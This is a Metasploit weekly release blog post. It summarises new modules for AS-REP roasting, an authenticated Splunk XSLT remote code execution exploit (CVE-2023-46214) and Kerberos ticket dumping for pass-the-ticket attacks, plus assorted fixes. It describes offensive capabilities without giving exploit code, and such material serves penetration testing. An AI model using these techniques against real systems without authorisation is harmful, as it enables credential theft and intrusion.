Metasploit Weekly Wrap-Up: Dec. 15, 2023

Continuing the 12th Labor of Metasploit

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible based on the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation right from with Metasploit, there’s even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

• #18539 from dwelch-r7 - This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
• #18598 from bwatters-r7 - :
  This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.
• #18601 from MikeAnast - Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

• #18606 from Lorenyx - rpc_plugin has been updated to correctly use the provided plugin options.
• #18609 from adfoster-r7 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
• #18613 from dwelch-r7 - Ensures that after listing files within an SMB directory that the handle is closed.
• #18614 from sjanusz-r7 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.46…6.3.47
• Full diff 6.3.46…6.3.47

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro